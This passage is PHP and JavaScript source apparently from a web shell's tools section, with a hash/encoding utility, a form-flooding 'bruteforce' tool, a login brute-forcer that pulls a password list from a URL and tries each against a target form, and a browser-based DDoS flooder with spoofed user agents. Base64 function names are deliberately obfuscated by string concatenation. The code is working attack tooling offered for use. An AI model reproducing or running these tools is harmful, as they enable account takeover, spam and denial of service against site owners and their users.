<option value='hex-asc'>Hex => Ascii</option>
<option value='hex-bin'>Hex => Binary</option>
<option value='bin-asc'>Binary => Ascii</option>
<option value='bin-hex'>Binary => Hex</option>
</select>
</div>
<div class='hash'>
<input type='radio' name='encr' value='crypt'><label>Crypt</label>
<input type='text' id='crypt-salt' name='salt' placeholder='\$alt'/>
</div>
<div class='hash'>
<input type='radio' name='encr' value='hash'><label>Hash</label>
<select id='hash-hash'><option value='md2'>md2</option><option value='md4'>md4</option><option value='md5'>md5</option><option value='sha1'>sha1</option><option value='sha256'>sha256</option><option value='sha384'>sha384</option><option value='sha512'>sha512</option><option value='ripemd128'>ripemd128</option><option value='ripemd160'>ripemd160</option><option value='ripemd256'>ripemd256</option><option value='ripemd320'>ripemd320</option><option value='whirlpool'>whirlpool</option><option value='tiger128,3'>tiger128,3</option><option value='tiger160,3'>tiger160,3</option><option value='tiger192,3'>tiger192,3</option><option value='tiger128,4'>tiger128,4</option><option value='tiger160,4'>tiger160,4</option><option value='tiger192,4'>tiger192,4</option><option value='snefru'>snefru</option><option value='gost'>gost</option><option value='adler32'>adler32</option><option value='crc32'>crc32</option><option value='crc32b'>crc32b</option><option value='haval128,3'>haval128,3</option><option value='haval160,3'>haval160,3</option><option value='haval192,3'>haval192,3</option><option value='haval224,3'>haval224,3</option><option value='haval256,3'>haval256,3</option><option value='haval128,4'>haval128,4</option><option value='haval160,4'>haval160,4</option><option value='haval192,4'>haval192,4</option><option value='haval224,4'>haval224,4</option><option value='haval256,4'>haval256,4</option><option value='haval128,5'>haval128,5</option><option value='haval160,5'>haval160,5</option><option value='haval192,5'>haval192,5</option><option value='haval224,5'>haval224,5</option><option value='haval256,5'>haval256,5</option></select>
<input type='checkbox' id='hash-raw'/> Raw
</div>
<div class='hash'>
<input type='submit' onclick=\"
url='';
textencode=window.btoa(document.getElementById('hashtext').value);
radios=document.getElementsByName('encr');
for(var i=0,length=radios.length;i<length;i++){
if (radios[i].checked){
switch(radios[i].value){
case 'basic':
url='?z=encryptor&opt=basic&hash='+document.getElementById('basic-hash').value+'&text-encode='+textencode;
break;
case 'extra':
url='?z=encryptor&opt=extra&hash='+document.getElementById('extra-hash').value+'&text-encode='+textencode;
break;
case 'crypt':
url='?z=encryptor&opt=crypt&salt='+document.getElementById('crypt-salt').value+'&text-encode='+textencode;
break;
case 'hash':
url='?z=encryptor&opt=hash&hash='+document.getElementById('hash-hash').value+'&raw='+document.getElementById('hash-raw').checked+'&text-encode='+textencode;
break;
}
break;
}
}
return getAjax(false,'hashresult','POST',url);
\"/>
<input type='submit' onclick=\"
tempi=document.getElementById('hashresult').value;
tempi1=document.getElementById('hashtext').value;
document.getElementById('hashtext').value=tempi.trim();
document.getElementById('hashresult').value=tempi1.trim();
\" value='Swap'/>
</div>
</div>
<div class='hash-capture'>
<div class='hash-capture-left'>
<label>String</label><textarea id='hashtext'></textarea>
<input type='submit' onclick=\"
document.getElementById('hashtext').value='';
\" value='Clear'/>
</div>
<div class='hash-capture-right'>
<label>Result</label><textarea id='hashresult'></textarea>
<input type='submit' onclick=\"
document.getElementById('hashresult').value='';
\" value='Clear'/>
</div>
</div>
</form>
</div>");
function chr_asc($str){
$asc='';
for($i=0;$i<strlen($str);$i++)
$asc.=ord($str{$i}).' ';
return rtrim($asc);
}
function asc_chr($asc){
$str='';
if (strpos($asc,' ')){
$exps=explode(' ',$asc);
foreach($exps as $exp)
$str.=chr($exp);
}else{
$str=chr($asc);
}
return $str;
}
function asc_hex($asc){
$hex='';
for ($i=0;$i<strlen($asc);$i++)
$hex.=sprintf("%02x",ord(substr($asc,$i,1)));
return $hex;
}
function hex_asc($hex){
$asc='';
for ($i=0;$i<strlen($hex);$i+=2)
$asc.=chr(hexdec(substr($hex,$i,2)));
return $asc;
}
function hex_bin($hex){
$bin='';
for($i=0;$i<strlen($hex);$i++)
$bin.=str_pad(decbin(hexdec($hex{$i})),4,'0',STR_PAD_LEFT);
return $bin;
}
function bin_hex($bin){
$hex='';
for($i=strlen($bin)-4;$i>=0;$i-=4)
$hex.=dechex(bindec(substr($bin,$i,4)));
return strrev($hex);
}
function asc_bin($asc){
$hex=asc_hex($asc);
return hex_bin($hex);
}
function bin_asc($bin){
$hex=bin_hex($bin);
return hex_asc($hex);
}
if(any("opt",$_REQUEST))
{
ob_clean();
$opt=$_REQUEST['opt'];
$_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4";
$_g="_";$_h="e";$_i="n";$_j="c";$_k="o";$_l="d";$_m="e";
$b64e=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m;
$b64d=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_l.$_m.$_j.$_k.$_l.$_m;
$text=$b64d($_POST['text-encode']);
if ($opt=='basic')
{
$hash=$_REQUEST['hash'];
switch($hash)
{
case "md5":print md5($text);break;
case "sha1":print sha1($text);break;
case "chr":print asc_chr($text);break;
case "asc":print chr_asc($text);break;
case "crc32":print crc32($text);break;
case "strlen":print strlen($text);break;
case "strrev":print strrev($text);break;
case "urlencode":print urlencode($text);break;
case "urldecode":print urldecode($text);break;
case "entties":print htmlentities($text);break;
case "spechar":print htmlspecialchars($text);break;
case "base64_encode":print $b64e($text);break;
case "base64_decode":print $b64d($text);break;
case "B64E":print B64E($text);break;
case "B64D":print B64D($text);break;
}
}
elseif($opt=='extra')
{
$hash=$_REQUEST['hash'];
switch($hash)
{
case "chr-asc":print str_asc($text);break;
case "asc-chr":print asc_str($text);break;
case "asc-hex":print asc_hex($text);break;
case "hex-asc":print hex_asc($text);break;
case "hex-bin":print hex_bin($text);break;
case "bin-hex":print bin_hex($text);break;
case "asc-bin":print asc_bin($text);break;
case "bin-asc":print bin_asc($text);break;
}
}
elseif($opt=='crypt')
{
$salt=$_REQUEST['salt'];
print crypt($text,$salt);
}
elseif($opt=='hash')
{
$hash=$_REQUEST['hash'];
$raw=$_REQUEST['raw'];
if($raw==true)
{
print hash($hash,$text,true);
}
else
{
print hash($hash,$text);
}
}
exit;
}
}
if($z=="form-bruteforces")
{
print "<div class='tools-header'>
<h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
<h3> by: ".$menu_tools[$z]['auth']."</h3>
</div>";
$exp=array(
'{',
'"name":"Handsome",',
'"email":"very@handsome.com",',
'"subject":"WHOOPS YOU GOT E-MAIL ?!",',
'"message":"HA HA HA HA HA HA HA HA",',
'}');
printf("<div class='divide'>
<div class='divide-left'>
<form onsubmit='return false;' class='new'>
<label>Url Action</label><input type='text' id='form-url' placeholder='http://'/><br>
<label>Count's</label><input type='number' id='form-count' value='100' min='10' autocomplete='off'/><br>
<label>Parameter (JSON)</label>
<textarea id='form-parameter'>%s</textarea>
<input type='submit' onclick=\"return ajaxAbort(true,'form-result')\" value=Cancel />
<input type='submit' value='Attack' onclick=\"return getAjax(true,'form-result','POST','?z=form-bruteforces&url='+document.getElementById('form-url').value+'¶meter='+document.getElementById('form-parameter').value+'&count='+document.getElementById('form-count').value);\"/><br>
</form>
</div>
<div class='divide-right'>
<fieldset>
<legend>Result's</legend>
<div id='form-result' class='result'></div>
</fieldset>
</div>
</div>",implode($exp,"\n"));
if(any("url",$_REQUEST)&&any("parameter",$_REQUEST))
{
ob_clean();
$start=$succ=$fail=0;
$url=$_REQUEST['url'];
$count=$_REQUEST['count'];
$parameter=$_REQUEST['parameter'];
$content=json_decode($parameter,true);
if(!is_array($content))$content=array();
do {$start++;
$ch=curl_init();
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);
curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($content));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
$result=curl_exec($ch);
$httpcode=curl_getinfo($ch,CURLINFO_HTTP_CODE);
if(curl_error($ch)) echo curl_error($ch);
curl_close($ch);
if($httpcode==200)
{
$succ++;
}
else
{
$fail++;
}
if($start==$count)
{
echo "Success: $succ<br>Failed: $fail<br>Messages: ".htmlspecialchars($result);
}
}while($start<=$count);
exit;
}
}
if($z=="login-bruteforces")
{
print "<div class='tools-header'>
<h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
<h3> by: ".$menu_tools[$z]['auth']."</h3>
</div>";
printf("<div id='login-bruteforces'>
<div class='divide-left'>
<form onsubmit='return false;' class='new'>
<label>Url Action</label><input type='text' id='login-url' placeholder='http://'/><br>
<label>User List</label><input type='text' id='login-user' placeholder='admin' value='admin'/><br>
<label> </label><input type='text' id='login-username' placeholder='User Fieldname'/><br>
<label>Pass List</label><input type='text' id='login-passlist' placeholder='http://'/><br>
<label> </label><input type='text' id='login-passname' placeholder='Pass Fieldname'/><br>
<input type='submit' onclick=\"return getAjax(true,'login-result','POST',
'?z=login-bruteforces'+
'&url='+document.getElementById('login-url').value+
'&user='+document.getElementById('login-user').value+
'&userfield='+document.getElementById('login-username').value+
'&passfield='+document.getElementById('login-passname').value+
'&passlist='+document.getElementById('login-passlist').value);\"/><br>
</form>
</div>
<div class='divide-right'>
<fieldset>
<legend>Result's</legend>
<div id='login-result' class='result'></div>
</fieldset>
</div>
</div>");
if(any("url",$_REQUEST)&&any("user",$_REQUEST))
{
ob_clean();
$url=$_REQUEST['url'];
$user=$_REQUEST['user'];
$file=GetUrlExists($_REQUEST['passlist'])?
GetUrlContent($_REQUEST['passlist']):
$_REQUEST['passlist'];
$words=explode("\n",$file);
$length=count($words);
foreach ($words as $index => $word)
{
$parameter=http_build_query(
array(
$_REQUEST['userfield'] => $user,
$_REQUEST['passfield'] => $word,
'Submit' => 'Submit',
)
);
$ch=curl_init();
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_TIMEOUT,5);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);
curl_setopt($ch,CURLOPT_POSTFIELDS,$parameter);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$ra=curl_exec($ch);
$st=curl_getinfo($ch,CURLINFO_HTTP_CODE);
if(curl_error($ch)) echo curl_error($ch);
curl_close($ch);
if ($st==200)
{
echo "FOUND'S: $user:$word<br>";
exit;
}
else
{
echo htmlspecialchars($ra);
}
}
exit;
}
}
if($z=="mass-tools")
{
print "<div class='tools-header'>
<h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
<h3> by: ".$menu_tools[$z]['auth']."</h3>
</div>";
print "Coming Soon";
}
if($z=="ddos-attack")
{
print "<div class='tools-header'>
<h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
<h3> by: ".$menu_tools[$z]['auth']."</h3>
</div>";
printf('<script type="text/javascript">
window.onload=function(){
startTime();
var interval;
var xhttp;
var requestsNode=document.getElementById("requests"),
successNode=document.getElementById("success"),
proccessNode=document.getElementById("proccess"),
targetNode=document.getElementById("target"),
attack=document.getElementById("attack"),
method=document.getElementById("method"),
size=document.getElementById("size"),
time=document.getElementById("time"),
stamp=document.getElementById("stamp")
uagent=document.getElementById("uagent")
referer=document.getElementById("referer")
origin=document.getElementById("origin")
var requests=0,
succeeded=0,
proccess=0;
var makeHttpRequest=function(){
var data=new FormData();
var buff=new ArrayBuffer(65536);
var xhrx=new XMLHttpRequest();
var agent =["Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"];
randomize=function(arr){
rand=Math.floor((Math.random()*arr.length));
return arr[rand];}
xhrx.open(method.value,targetNode.value,true);
if (uagent.checked) xhrx.setRequestHeader("user-agent",randomize(agent));
if (referer.checked) xhrx.setRequestHeader("referer",targetNode.value);
if (origin.checked) xhrx.setRequestHeader("origin","*");
xhrx.onreadystatechange=function(){
if(xhrx.readyState==XMLHttpRequest.DONE){
if(xhrx.status>=500){
onSuccess();
}
onProcess();
}
onRequest();
}
xhttp=xhrx;
attack=function(){
str="";arr=new Uint32Array(buff);
window.crypto.getRandomValues(arr);
for(var i=0;i<arr.length;i++){
str+=String.fromCharCode(arr[i]);
}return str;}
what=attack();
for(var j=0;j<size.value;j++){
data.append(what, stamp.value);}
xhrx.send(data);
};
var onRequest=function(){
requests++;
requestsNode.innerHTML=requests;
};
var onProcess=function(){
proccess++;
proccessNode.innerHTML=proccess;
};
var onSuccess=function(){
success++;
successNode.innerHTML=success;
};
attack.onclick=function(){
var today=new Date();
var h=today.getHours();
var m=today.getMinutes();
var s=today.getSeconds();
m=m<10?"0"+m:m;
s=s<10?"0"+s:s;
if(this.value==\'Start\'){
this.value="Stop";
requests=0;
succeeded=0;
proccess=0;
document.getElementById("start").innerHTML="00:00:00";
document.getElementById("finish").innerHTML="00:00:00";
interval=setInterval(makeHttpRequest,(parseInt(time.value)));
document.getElementById("start").innerHTML=h+":"+m+":"+s;
}else if(this.value==\'Stop\'){
this.value="Start";
xhttp.abort();
clearInterval(interval);
document.getElementById("finish").innerHTML=h+":"+m+":"+s;
}
};
function startTime(){
var today=new Date();
var h=today.getHours();
var m=today.getMinutes();
var s=today.getSeconds();
m=m<10?"0"+m:m;
s=s<10?"0"+s:s;
document.getElementById("times").innerHTML=h+":"+m+":"+s;
var t=setTimeout(startTime,500);
}
}
</script>
<form onsubmit="return false;" class="new">
<label>Target</label><input type="text" id="target" value="http://www.target.com"><br>
<label>Stamp</label><input type="text" id="stamp" value="DDOS ATTACK !!!"><br>
<label>Method</label><select id="method">
<option value="PUT">PUT</option>
<option value="GET">GET</option>
<option value="POST">POST</option>
<option value="HEAD">HEAD</option>
<option value="TRACE">TRACE</option>
<option value="PATCH">PATCH</option>
<option value="OPTIONS">GET</option>
<option value="DELETE">DELETE</option>
<option value="CONNECT">CONNECT</option>
<option value="OPTIONS">OPTIONS</option>
</select><br>
<label>Size (kB)</label><input type="number" id="size" value="1024"><br>
<label>Time (ms)</label><input type="number" id="time" value="500"><br>
<label>Options</label>
<input type="checkbox" id="uagent" name="uagent" style="vertical-align:middle"> User Agent
<input type="checkbox" id="referer" name="referer" style="vertical-align:middle"> Referer Target
<input type="checkbox" id="origin" name="origin" style="vertical-align:middle"> Origin<br>
<label style="margin:5px 0px 5px">
Time <span id="times">00:00:00</span> |
Start <span id="start">00:00:00</span> |
Finish <span id="finish">00:00:00</span>
</label><br>
<label style="margin:0px 0px 5px">
Requests <span id="requests">0</span> |
Proccess <span id="proccess">0</span> |
Success <span id="success">0</span>
</label><br>
<input type="submit" id="attack" value="Start"/>
</form>');
}
print "</div>";
}
/* END CUSTOM TOOLZ */
printf("</div><!-- content -->
</div><!-- container -->
<div id='footer'>
<div id='copyrights'><a href='//github.com/k4mpr3t/b4tm4n'>k4mpr3t</a> © %s</div>
<div id='pageload'>Page Loaded in %s Seconds</div>
</div>
</body>
</html>",date('Y'),round((microtime(true)-$start),2)
);
}?>